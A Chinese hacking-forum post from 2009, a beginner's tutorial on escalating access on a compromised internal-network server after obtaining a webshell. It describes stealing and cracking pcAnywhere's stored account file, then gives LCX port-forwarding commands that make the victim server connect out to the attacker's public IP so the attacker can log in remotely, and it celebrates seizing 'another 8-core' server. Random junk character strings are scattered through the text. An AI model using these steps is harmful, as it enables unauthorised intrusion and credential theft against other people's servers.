|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。+ Q w: L( R8 i/ |! n) v) @
0 A/ F3 I& P+ c5 N6 G; W$ E% E提权方法:pcanywhere+LCX9 V U$ N% S) z2 r
+ n9 L7 }, B8 \9 N' Q获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。! I( ^6 K- d* h2 |
+ U5 y" S" Z$ e0 P4 y
在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。& V( i3 @8 Y: K7 E2 l* _" L, C
& G0 H- ?" ^4 J- H& p/ [0 ^8 N
查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。
( p2 f p3 Y" Y; s1 B( ^
5 O) C& ^- d# F) q5 B" }' u0 h- e1 c M( O5 q
呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。
: i0 x& ~2 K5 v" z- g& o: n% [8 o) E8 [
- b. Y/ B: S- t; m8 j4 e8 |% P* ~) U/ ?6 s v0 t! e
4 n" g- P: P* J7 n( C* D+ j( }
由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``
" B: a0 y! c& s4 `5 \9 _7 C! z! O
0 o' F* k9 a$ e- s7 Y& Q! o- m: I7 |/ V$ k+ N5 z
LCX的用法再简单说下:: P& F/ M) W9 k
# x5 q3 c% s" A8 n服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)
- k5 y- R. J, d$ Z
. @! P6 t* _. U2 P本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)
' |' {- r# U! S2 |7 l/ b
]" n0 J8 e) R8 U: L( D由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。
$ t' B6 J Q$ p1 j% ^顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``
6 {; N- {5 O8 ]# @- Y
4 N7 w% Q* o' o- k+ }
5 o' p2 m5 T4 a' p, l
; L' P8 O- X8 j% A8 z& J
6 }9 T5 I, E0 v D* t! q: h7 m* A) P# ]呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。
5 }$ ], q6 c8 J' H3 p, C
6 o0 j# z9 _2 l. ?2 G3 U) A" |" p9 v
, W/ z) L1 P" C, N; G( x$ X) d2 q; R7 O* h
我们本地连接试试,输入我们刚破解的账号密码0 d5 {5 N- @, Q" x+ T
7 B& Y/ Q, |' L5 E8 r9 N$ T
6 l9 |+ D" S1 L4 H }! ` I呵呵``连接成功,服务器不错,又一个8核^︵^
0 g7 A- {: u4 S+ k& d/ D. c6 D& a( y8 s3 t1 M9 L
1 E" g( {2 e& x5 s3 p$ }& r9 h7 t/ m) v7 u+ X, n
|
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-7-5 21:35
| 
发表于 2009-7-5 21:37
| .gif)
